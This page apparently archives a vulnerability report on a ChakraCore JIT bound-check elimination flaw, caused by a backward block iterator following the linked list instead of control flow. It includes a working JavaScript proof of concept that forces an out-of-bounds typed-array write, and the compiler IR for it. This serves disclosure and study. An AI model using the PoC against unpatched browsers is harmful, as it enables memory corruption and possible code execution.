扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 |
/* Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instaed of the control flow. This may lead to incorrectly remove the bound checks. In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order with following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break) in order. This makes the block 2 have the wrong information about the bounds which affects the bound checks in the block 5 to be removed. https://github.com/Microsoft/ChakraCore/blob/48c73e51c3e0fb36a08fa844cdb88c9d8a54de32/lib/Backend/GlobOpt.cpp#L14667 if(hoistBlock != currentBlock) { for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr); it.IsValid(); it.MoveNext()) { BasicBlock *const block = it.Block(); ... PoC: */ function opt(arr, idx) { ((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234); } function main() { let arr = new Uint32Array(1); for (let i = 0; i < 10000; i++) { opt(arr); } } main(); /* Here's the IR code for the PoC: FunctionEntry # --------- BLOCK 0: Out(1, 2) $L8:# s1[Object].var=Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I42147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # s3[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var # s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I42147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_Aprm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! # s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_Aprm3<48>[LikelyUndefined_CanBeTaggedValue].var! # Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234); Col7: ^ StatementBoundary#0#0000 BailOnNotArrays7[LikelyCanBeTaggedValue_Uint32Array].var #0000Bailout: #0000 (BailOutOnNotArray) s25.u32 =LdIndir[s7[Uint32Array].var+32].u32#0000 NoImplicitCallUsess25.u32#0000 ByteCodeUses s7#0000 s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s25.u32#0000 s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 ByteCodeUses s10 #0004 BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004 --------- BLOCK 1: In(0) Out(2, 3) $L7:#0008 s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var#0008 s9[Boolean].var =Ld_A 0xXXXXXXXX (true)[Boolean].var#0008 BoundCheck 2147483633 < s25.u32#000fBailout: #000f (BailOutOnFailedHoistedBoundCheck) s27.u64 =LdIndir[s7[Uint32Array].var+56].u64#000f NoImplicitCallUsess25.u32#000f s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A[s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000fBailout: #000f (BailOutConventionalTypedArrayAccessOnly) ByteCodeUses s16 #0015 s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015 s9[CanBeTaggedValue_Int].var = ToVars29(s9)[CanBeTaggedValue_Int].i32 #0018 ByteCodeUses s16 #0018 BrTrue_I4$L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018 --------- BLOCK 2: In(0, 1) Out(5) $L4:#001c s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #001c Br $L2 #001e --------- BLOCK 3: In(1) Out(4) DeadOut(5) $L3:#0021 NoImplicitCallUsess25.u32#0021 ByteCodeUses s7#0021 s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s25.u32#0021 s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 ByteCodeUses s17 #0025 --------- BLOCK 4: In(3) Out(8, 5) $L6:#0029 s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var#0029 s9[Boolean].var =Ld_A 0xXXXXXXXX (true)[Boolean].var#0029 NoImplicitCallUsess25.u32#0030 s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A[s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly) ByteCodeUses s19 #0036 s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036 s9[CanBeTaggedValue_Int].var = ToVars29(s9)[CanBeTaggedValue_Int].i32 #0039 ByteCodeUses s19 #0039 BrTrue_I4$L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039 --------- BLOCK 5: In(2, 4) Out(6) DeadIn(3) $L2:#003d s32.u64 =LdIndir[s7[Uint32Array].var+56].u64#003d NoImplicitCallUsess25.u32#003d [s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A4660 (0x1234).i32 #003dBailout: #003d (BailOutConventionalTypedArrayAccessOnly) s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043 ByteCodeUses s20 #0046 s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046 s34.u64 =Ld_A s32.u64 #004b Br $L1 #004b --------- BLOCK 8: **** Air lock Block **** In(4) Out(6) $L9:#004b s34.u64 =Ld_A s27.u64 #004b Br $L1 #004b --------- BLOCK 6: In(8, 5) Out(7) $L1:#004b s0[Undefined].var = Ld_A0xXXXXXXXX (undefined)[Undefined].var #004b Line 3: } Col1: ^ StatementBoundary#1#004d StatementBoundary#-1 #004d Rets0[Undefined].var!#004d --------- BLOCK 7: In(6) $L5:# ---------------------------------------------------------------------------------------- */ |
体验盒子
